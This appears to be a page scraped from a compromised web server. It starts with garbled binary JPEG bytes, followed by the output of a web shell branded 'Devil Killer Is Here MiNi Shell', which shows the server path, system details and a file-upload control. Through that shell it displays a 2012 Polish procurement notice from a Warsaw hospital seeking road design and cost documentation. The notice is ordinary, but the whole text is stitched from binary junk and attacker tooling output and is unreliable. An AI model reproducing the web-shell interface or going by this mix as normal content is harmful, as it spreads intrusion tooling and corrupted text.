JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120420/90631-N-2012.html

<p class="kh_header"><b>Warszawa: Wykonanie dokumentacji projektowo - kosztorysowej w zakresie przebudowy i modernizacji układu komunikacji wew., na terenie szpitala  oraz pełnienie nadzoru autorskiego</b><br>
<b>Numer ogłoszenia: 90631 - 2012; data zamieszczenia: 20.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wolski im. dr Anny Gostyńskiej Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Kasprzaka 17, 01-211 Warszawa, woj. mazowieckie, tel. 022 3894859, faks 022 3894922.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wolski.med.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie dokumentacji projektowo - kosztorysowej w zakresie przebudowy i modernizacji układu komunikacji wew., na terenie szpitala  oraz pełnienie nadzoru autorskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotu zamówienia:Opracowanie dokumentacji projektowo-kosztorysowej w zakresie przebudowy i modernizacji: - układu komunikacji wewnętrznej (drogi wewnętrzne  pożarowe, ciągi pieszo-jezdne,  miejsca parkingowe)  na  terenie Szpitala  Wolskiego oraz  pełnienie nadzoru  autorskiego  nad  realizacją  robót wykonywanych na podstawie opracowanej dokumentacji.
3.2.  KOD CPV: 
74.23.20. 00 - 2   usługi architektoniczne, inżynieryjne   i planowania.
3.3. Przedmiotem zamówienia jest:  Wykonanie dokumentacji projektowo kosztorysowej w zakresie przebudowy i modernizacji układu komunikacji wewnętrznej (drogi wewnętrzne, pożarowe, ciągi pieszo-jezdne,  miejsca parkingowe)  na terenie Szpitala  Wolskiego oraz pełnienie nadzoru autorskiego. 
Powyższe prace będą wykonane w ramach zadania inwestycyjnego pn.Rozbudowa i modernizacja Szpitala Wolskiego 
Projektowana inwestycja będzie realizowana na terenie będącym  we władaniu Szpitala Wolskiego (a stanowiącym własność Miasta  Stołecznego Warszawy). 
Powierzchnia  całego terenu Szpitala Wolskiego  wynosi  ok.6,4 ha , w tym  teren objęty przedmiotową inwestycją  to działka ewidencyjna:
nr 17 7- 4.9317 ha, 
nr 17 2 - 0.2805 ha,  
nr 124-   0.0299 ha. 
Celem zadania inwestycyjnego jest  przebudowa i modernizacja:
A) układu komunikacyjnego  w celu   uzyskana prawidłowo  technologicznych   połączeń 
       pomiędzy poszczególnymi   pawilonami   z uwzględnieniem-
1)	ruchu chorych  i  osób odwiedzających  (pieszy i kołowy);
2)	ruchu transportowego wewnętrznego  : leków,  posiłków,  zaopatrzenia medycznego;
3)	ruchu dostawczo-transportowego zewnętrznego 
   oraz  zabezpieczenie  szpitala w  prawidłowe  drogi pożarowe. 
1.	Opracowanie powinno obejmować w szczególności:  
	Dokumentację projektowo-kosztorysową  budowlaną  i  wykonawczą  wielobranżową  w tym:
a)	inwentaryzację szczegółową  przedprojektową
b)	koncepcję układu komunikacyjnego
c)	projekt bud.-  drogowy 
d)	 projekt zagospodarowania teren,
e)	 projekt organizacji ruchu i układu komunikacyjnego,
f)	projekt  instalacji  sanitarnych (odwodnienia),
g)	projekt instalacji elektrycznej i teletechnicznej, (w tym projekt oświetlenia układu komunikacyjnego). 
h)	projekt inwentaryzacji zieleni wraz z gospodarką szatą roślinną,
i)	inne projekty uzupełniające wynikające z przyjętych rozwiązań technicznych, w tym m.in. projekt oznakowania terenu szpitala (tablice informacyjne określające kierunek przez dojazdu do pawilonów kompleksu szpitalnego). 
j)	specyfikacje techniczne wykonania i odbioru robót budowlanych (dla każdej branży    oddzielnie). 
2.	Dokumentacje kosztorysową:
a)	kosztorysy inwestorskie (dla każdej branży oddzielnie)
b)	przedmiary robót  (dla każdej branży oddzielnie)
c)	zbiorcze zestawienie kosztów 
3.	Dokumentację projektową, specyfikację techniczną wykonania i odbioru robót budowlanych oraz inne wymagane opracowania, należy wykonać zgodnie z:                                    
1)	Rozporządzeniem Ministra  infrastruktury z dnia 2 września 2004 roku w sprawie szczegółowego  zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego  (Dz. U. Nr 202,poz.2072  ze zm.).  
2)	Rozporządzeniem Ministra  Infrastruktury z dnia 23 czerwca 2003 roku w sprawie informacji dotyczącej  bezpieczeństwa  i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia  (Dz. U. Nr 120 ,poz.1126). 
3)	Rozporządzeniem  Ministra Infrastruktury z   dnia 18 maja 2004 r. w sprawie określenia  metod i podstaw   sporządzania  kosztorysu inwestorskiego, obliczania  planowanych    kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-  użytkowym   (Dz. U. Nr 130 poz.1389).
4)	Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 roku w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie  (Dz. U. nr 75 poz.690 ze zm.).
5)	Rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 21 kwietnia  2006 r. w sprawie ochrony przeciwpożarowej  budynków, innych obiektów budowlanych  i terenów (Dz. U. Nr 80 poz.563).
6)	Ustawą z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2006 r. Nr 156 poz.1118 z późn. zm.).
7)	Rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 02.03.1999r. w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie.
8)	Rozporządzenie Ministra Transportu i Gospodarki Morskiej z dnia 30.05.2000 w sprawie   warunków technicznych, jakim powinny odpowiadać drogowe obiekty inżynierskie i ich   usytuowanie.
9)	Obowiązującymi w dacie przekazania opracowania przepisami pozwalającymi na uzyskanie pełnych uzgodnień i pozwolenia na budowę.
Przedmiary robót  powinny uwzględniać wszystkie    niezbędne czynności wynikające z  konieczności zabezpieczenia prac oraz inne czynności nie   wynikające  bezpośrednio z dokumentacji technicznej w wyżej wymienionym zakresie.  


4.	Dokumentacja  projektowa  i  kosztorysowa winna  uwzględniać podział  zadania    inwestycyjnego na   etapy  realizacji.  
Zakres  poszczególnego  etapu  zostanie  uzgodniony z  Zamawiającym. 
5.	Nadzory autorskie  powinny być  wliczone w cenę ofertową. 
Pełnienie nadzoru autorskiego nad robotami budowlanymi wykonywanymi na podstawie   opracowanej dokumentacji sprawowane będzie zgodnie z art.20 ust.1 pkt.4 ustawy  Prawa  budowlanego i  m. in. obejmuje:
a)	nadzór nad zgodnością wykonawstwa z dokumentacją projektową w zakresie rozwiązań  materiałowych, użytkowych, technicznych i technologicznych;
b)	 wyjaśnianie wątpliwości dotyczących opracowanej dokumentacji projektowej i zawartych niej rozwiązań w  tym uszczegółowienia rysunków wykonawczych, nanoszenia poprawek;
c)	uzgadnianie z Zamawiającym możliwości wprowadzenia rozwiązań zamiennych w stosunku do przewidzianych w dokumentacji  projektowej, zgłoszonych przez kierownika budowy lub nadzór inwestorski;
d)	przedstawianie propozycji rozwiązań zamiennych, w przypadku niemożności zastosowania rozwiązań występujących w dokumentacji projektowej lub gdy ich zastosowanie jest nieekonomiczne w świetle aktualnej wiedzy i zasad sztuki budowlanej ,a koszt zastosowania nowych nie zwiększy zadania z zastrzeżeniem, że każde rozwiązanie musi być zaakceptowane przez Zamawiającego;
e)	poprawianie błędów projektowych, likwidację kolizji miedzy branżami lub uzupełnianie rysunków, bądź opisu technologii wykonania zawartych w dokumentacji- bez prawa do odrębnego wynagrodzenia;
f)	uczestnictwo w  koordynacjach technicznych  na wezwanie Zamawiającego. 
UWAGA: 
Dokumentacja projektowa powinna obejmować przebudowę instalacji oświetlenia zewnętrznego, która będzie kolidowała z przedmiotem zamówienia. 
Obowiązki wykonawcy:
1.	Uzyskanie we własnym zakresie i na własny koszt wszystkich niezbędnych danych wyjściowych do projektowania w tym np.:  map terenu  (w tym też  mapy do celów 
projektowych).
2.	Wykonanie opracowań, których przygotowanie okaże się  konieczne do sporządzenia kompletnej dokumentacji  (np. złożenie wniosku i uzyskania  Decyzji  o ustaleniu lokalizacji  inwestycji  celu publicznego). 
3.	Dokonanie uzgodnień międzybranżowych  jak również   uzgodnień  z rzeczoznawcami. 
4.	Uzyskanie wszelkich wymaganych przepisami prawa uzgodnień, opinii, wytycznych (np. od Stołecznego Konserwatora Zabytków), jeżeli jest to niezbędne do wykonania opracowania. Nadmieniamy, że zespół budowlany (teren plus budynki podlega) Szpitala Wolskiego objęty jest opieką przez Stołecznego Konserwatora Zabytków.
5.	Uzgodnienia jest przed przystąpieniem do prac projektowych z Zamawiającym  zakresu robót ujętych w opracowaniu.
6.	Projekty budowlano-wykonawcze musza spełniać wymagania niezbędne do uzyskania decyzji o pozwoleniu na budowę bądź zgłoszenia właściwemu organowi wykonania robót  budowlanych. 
7.	Dokumentację Wykonawca złoży Zamawiającemu  w formie papierowej wydrukowanej z  plików PDF w 5 egzemplarzach , natomiast specyfikacje techniczne,  kosztorysy  inwestorskie, przedmiarów robót -   należy wykonać w 3 egzemplarzach, ponadto
Wykonawca    zobowiązany jest dostarczyć    dokumentację  projektowo-kosztorysową w  wersji elektronicznej  ogólnodostępnej (1 płytka)  oraz  tylko do   odczytu (1 płytka). 
8.	W zakres zamówienia wchodzi również dokonanie przez Wykonawcę wszelkich poprawek  uzupełnień, modyfikacji dokumentacji, których wykonanie będzie wymagane w celu przyjęcia dokumentacji przez instytucje dokonujące  ewentualną ocenę, a także w przypadku gdy konieczność wprowadzenia takich poprawek uzupełnień wystąpi po przyjęciu przez Zamawiającego  przedmiotu zamówienia i zapłacie za jego wykonanie. 
9.	Wykonawca zamówienia zobowiązany będzie przekazać bez dodatkowego wynagrodzenia na rzecz Zamawiającego wszelkie prawa autorskie i majątkowe wynikające z tytułu wykonanej dokumentacji.
10.	Zamawiający wymaga, aby Wykonawca w dokumentacji projektowej oraz specyfikacji 
 technicznych wykonania i odbioru robót określił właściwości urządzeń i materiałów z uwzględnieniem ar.29 ust.2 i 3 i zgodnie z wymaganiami art.30 ust.1-3 ustawy Prawo zamówień publicznych z dnia 29.01.2004r.(tekst jednolity Dz. U .z 2007 r. nr 223 ,poz.1655 z późn. zm. ).  Jeżeli wykonawca określi w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót właściwości urządzeń lub materiałów za pomocą znaku towarowego, patentu lub pochodzenia, zobowiązany będzie opisać w tych opracowaniach rozwiązania równoważne w sposób umożliwiający przygotowanie oferty na wykonanie robót budowlanych. 
Informujemy, że nie posiadamy dokumentacji archiwalnej dotyczącej przedmiotowego  zadania.        
Prosimy o  zapoznanie się z przedmiotem SIWZ. 
Dla ważności umowy wymagane będzie uzyskanie przez Zamawiającego od Organu Założycielskiego Zamawiającego odpowiednich środków finansowych przeznaczonych na sfinansowanie całości zadania inwestycyjnego stanowiącego przedmiot niniejszej umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 7 Ustawy w przypadku wystąpienia okoliczności polegających na konieczności powtórzenia tego samego rodzaju zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 74.23.20.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawcy przystępujący do postępowania zobowiązani są wnieść wadium kwocie: 6.000,00 PLN (słownie: sześć tysięcy złotych).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniana wymaganych warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniana wymaganych warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniana wymaganych warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniana wymaganych warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniana wymaganych warunków zostanie dokonana zgodnie z formułą spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">5)	Pełnomocnictwo do podpisania oferty. Pełnomocnictwo należy załączyć do oferty tylko w przypadku, gdy oferta jest podpisania przez osobę nie figurującą w rejestrze lub wpisie do ewidencji działalności gospodarczej. Brak podpisu na ofercie lub podpisanie oferty przez osobę do tego nieupoważnioną spowoduje konieczność odrzucenia oferty. W przypadku składnia oferty przez podmioty występujące wspólnie, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego jeżeli oferta nie jest podpisana przez wszystkich Wykonawców występujących wspólnie. Postępowanie o udzielenie zamówienia publicznego nie jest postępowaniem sądowym, stwierdzić należy, że złożenie dokumentu pełnomocnictwa lub prokury albo jego odpisu, wypisu lub kopii przez pełnomocnika wykonawcy w postępowaniu o udzielenie zamówienia publicznego nie podlega opłacie skarbowej.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniony formularz oferty - załącznik nr 1 do SIWZ 
2)	Istotne dla stron postanowienia, które zostaną wprowadzone do treści umowy  - Załącznik nr 7.
3)	Załącznik nr 8 - oświadczenie o zapoznaniu się z obiektem - poświadczone przez Zamawiającego.
4)	Dowód wpłaty wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2.	Strony przewidują następujące możliwości zmiany umowy:
1)	zmiany terminu realizacji umowy w przypadku, przedłużenia się procedur administracyjnych poza terminy określone w KPA oraz poza inne terminy formalno - prawne mające wpływ na terminy realizacji zamówienia,
2)	zmiany sposobu realizacji umowy czy terminu realizacji umowy, gdy zmiana jest uzasadniona potrzebami Zamawiającego. 
3)	zmiany sposobu realizacji umowy, gdy zmiana jest korzystna dla Zamawiającego.
4)	w przypadku zmiany kluczowego personelu Wykonawcy lub Zamawiającego;
5)	w przypadku zmiany przepisów w trakcie realizacji umowy,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wolski.med.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wolski im. dr Anny Gostyńskiej, Samodzielny Publiczny Zakład Opieki Zdrowotnej, 01 - 211 Warszawa, ul. Kasprzaka 17 - pawilon nr 8 sekcja zamówień publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.04.2012 godzina 08:00, miejsce: Szpital Wolski im. dr Anny Gostyńskiej, Samodzielny Publiczny Zakład Opieki Zdrowotnej, 01 - 211 Warszawa, ul. Kasprzaka 17 - pawilon nr 2  kancelaria głowna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
